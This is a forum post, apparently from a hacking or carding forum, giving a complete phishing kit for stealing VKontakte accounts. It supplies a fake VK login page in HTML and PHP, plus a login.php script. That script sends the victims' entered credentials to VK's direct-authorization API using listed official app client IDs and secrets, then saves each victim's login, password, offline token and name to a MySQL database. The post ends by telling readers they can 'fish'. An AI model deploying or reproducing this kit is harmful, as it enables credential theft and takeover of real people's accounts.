Hack VK

Lord777

Lord777

Professional
Messages
2,579
Reaction score
1,472
Points
113
The essence of the mechanism is that we will send data from HTML forms to VK servers. In response, we will receive an access token.
We will do this using cUrl and direct authorization through the VK API. We will perform authorization as an official application. A direct authorization request looks something like this:

The code:
Code: 
https://api.vk.com/oauth/token?grant_type=password&client_id= [our value] & scope = [our value] & client_secret = [our value] & username = [our value] & password = [our value]

What does all of this mean:
  • clenit_id is the id of our application. Let's write the value 2274003 to the client_id.
  • scope - the access rights required by the application. We will not complicate our life, but simply request an offline token by writing the value "offline" to the scope. This will be enough to enter the VK page by token through apidog.ru. ! Important: such a token "lives" until the user changes the password, or ends all sessions in the security settings.
  • client_secret - your application's secret key. Will be equal to hHbZxrka2uZ6jB1inYsH
  • username - VK username
  • password - the password of the VKontakte user
Options for official clenit_id and client_secret

Android:
client_id: 2274003
client_secret: hHbZxrka2uZ6jB1inYsH

IPhone:
client_id: 3140623
client_secret: VeWdmVclDCtn6ihuP1nt

IPad:
client_id: 3682744
client_secret: mY6CDUswIVdJLCD3j15n

Windows desktop:
client_id: 3697615
client_secret: AlVXZFMUqyrnABp8ncuU

Windows phone:
client_id: 3502557
client_secret: PEObAuQi6KloPM4T30DV

Now you need an authorization form as in VK.
Create a php document authorize.php
authorize.php:
Code: 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
  <head>
  <?php
  $errorGet = $_GET['error_login'];
    if (!$errorGet)
    {
        echo "<style>
        #hide_row_pass {display: none;}
        </style>";
    }
else
    {
        echo "<style>
        #hide_row_pass {display: block;}
        </style>";
    }
  ?>
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <title> ВКонтакте | Login </title>
    <link rel="stylesheet" type="text/css" href="css/al/common.css?34795707965" /><link rel="stylesheet" type="text/css" href="css/al/fonts_cnt.css?5181750877" />
    <link type="text/css" rel="stylesheet" href="css/api/oauth_popup.css?29651175773"></link>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <link rel="shortcut icon" href="images/icons/favicons/fav_logo_2x.ico?8"></link>
  </head>

  <body class="VK oauth_centered">
    <script>
      if (window.devicePixelRatio >= 2) document.body.className += ' is_2x';
    </script>
    <div class="oauth_wrap">
      <div class="oauth_wrap_inner">
        <div class="oauth_wrap_content" id="oauth_wrap_content">
          <div class="oauth_head">
  <a class="oauth_logo fl_l" href="https://vk.com" target="_blank"></a>
  <div id="oauth_head_info" class="oauth_head_info fl_r">
    <a class="oauth_reg_link" href="https://vk.com/join?reg=1" target="_blank">Регистрация</a>
  </div>
</div>

<div class="oauth_content box_body clear_fix">
  <div class = "box_msg_gray box_msg_padded"> To continue, you need to log in <b> VK </b>. </div>

  <form method="POST" id="login_submit" action="login.php">
    <div class="oauth_form">
 
    <div id = "hide_row_pass" class = "box_error"> Invalid username or password specified. </div>
      <div class="oauth_form_login">
        <div class="oauth_form_header">Телефон или email</div>
        <input type="text" class="oauth_form_input dark" name="login" value="">
        <div class="oauth_form_header">Пароль</div>
        <input type="password" class="oauth_form_input dark" name="password" />
 
        <button class="flat_button oauth_button button_wide" id="install_allow" type="submit" name="submit_login">Войти</button>
        <a class="oauth_forgot" href="https://vk.com/restore" target="_blank">Забыли пароль?</a>
      </div>
    </div>
  </form>
</div>
        </div>
      </div>
    </div>
  </body>
</html>

5dcc39de3ce0a8ebff32c.png

3070f4e23bf492f51c219.png


Now we need a file that will send the login and password for authorization and receiving a token. Let's call login.php
But before that, we will create a database where we will write all valid data.

1. Go to hosting in PhpMyAdmin and click "Create"
cae8cd3dbf30685a124d7.png


2. Let's create a table with 7 columns
f34c973f7e2a27d9f071e.png


3. The parameters id, Login (login), Password (password), Token (token), Date (date), Name (first_name) and Surname (last_name) will be set as in the picture

The id column parameters must be set to A_I (auto_increment) and PRIMARY KEY.
2568ad71025f58828540b.png


Now the login.php file itself:
Code: 
<?php
// Create headers
$headers = array(
'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'content-type' => 'application/x-www-form-urlencoded',
'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'
);
// Write here the login and password values from the HTML form
$login = $_POST['login'];
$password = $_POST['password'];
// If some field is empty
if (empty($login) or empty($password))
{
// Send the user to the authorize start page and signal an error
    header('Location: /authorize.php?error_login=true');
    exit;
}
    else
{
// If all fields are filled in, then send a request to receive a token using our link above
    $get_token = post ('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.'' ,array(
    'headers' => array(
    'accept: '.$headers['accept'],
    'content-type: '.$headers['content-type'],
    'user-agent: '.$headers['user-agent']
    )
    ));
// If authorization was successful
if (preg_match("/[a-z0-9]{85}/", $get_token['headers'], $token))
{
    $token1 = json_decode(file_get_contents('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.''), true);
   $data = json_decode(file_get_contents('https://api.vk.com/method/users.get?user_id='.$token1['user_id'].'&access_token='.$token[0].'&fields=uid,first_name,last_name&v=5.80'), true);

   // Write the current date and time of the server to the variable
$date_l = date("H:i:s  d-m-Y");
// Connect to the database
    $host="localhost";
    $ user = ""; // Username from MySql
    $ pass = ""; // MySql password
    $ db_name = ""; // Base name
    $link=mysql_connect($host,$user,$pass);
    mysql_select_db($db_name,$link);
    mysql_query("set names utf8");
// Write valid to the database
    $sql = mysql_query("REPLACE INTO vk(login, password, token, date, user_id, first_name, last_name) VALUES('".$login."','".$password."','".$token[0]."','".$date_l."','".$token1['user_id']."','".$data['response'][0]['first_name']."','".$data['response'][0]['last_name']."')");
// If everything went well, then redirect the user to vk.com or to your site
    if ($sql) {
        session_start();
        $_SESSION['logged_user'] = $data['response'][0]['first_name'];
        header('Location: vk.com/');
// If errors are found during the recording, then we will redirect the user to the main page of our site with an error message
    } else header('Location: /authorize.php?error_login=true');
// Close the connection
mysql_close($link);
exit;
}
// If authorization failed, then send the user to the start page with an error
else header('Location: /authorize.php?error_login=true');
}
//cUrl POST
function post($url = null, $params = null, $proxy = null, $proxy_userpwd = null) {
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

if(isset($params['params'])) {
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_POSTFIELDS, $params['params']);
}

if(isset($params['headers'])) {
  curl_setopt($ch, CURLOPT_HTTPHEADER, $params['headers']);
}

if(isset($params['cookies'])) {
  curl_setopt($ch, CURLOPT_COOKIE, $params['cookies']);
}

if($proxy) {
  curl_setopt($ch, CURLOPT_PROXY, $proxy);

  if($proxy_userpwd) {
   curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxy_userpwd);
  }
}

$result = curl_exec($ch);
$result_explode = explode("\r\n\r\n", $result);

$headers = ((isset($result_explode[0])) ? $result_explode[0]."\r\n" : '').''.((isset($result_explode[1])) ? $result_explode[1] : '');
$content = $result_explode[count($result_explode) - 1];

preg_match_all('|Set-Cookie: (.*);|U', $headers, $parse_cookies);

$cookies = implode(';', $parse_cookies[1]);

curl_close($ch);

return array('headers' => $headers, 'cookies' => $cookies, 'content' => $content);
}
?>

Into variables $ host = "localhost";

$ user = ""; // Username from MySql

$ pass = ""; // MySql password

$ db_name = ""; // Base name

We enter our data.
On line 50, if the authorization was successful, you need to redirect the user to your site or wherever you want.
header ('Location: "Your site"');
It remains to upload all the files to the hosting and you can fish.
 
You must log in or register to reply here.

Similar threads

Friend
Create your own BOT
Replies
0
Views
278
Friend
Friend
Friend
Создание собственного чекера CC с помощью Stripe
Replies
0
Views
292
Friend
Friend
Man
Why do you need hardware security keys?
Replies
0
Views
121
Man
Man
Tomcat
We create a royal form for accepting bank cards
Replies
0
Views
268
Tomcat
Tomcat
Man
How to Steal a Saved Password in Chrome Using XSS
Replies
0
Views
132
Man
Man
Back
Top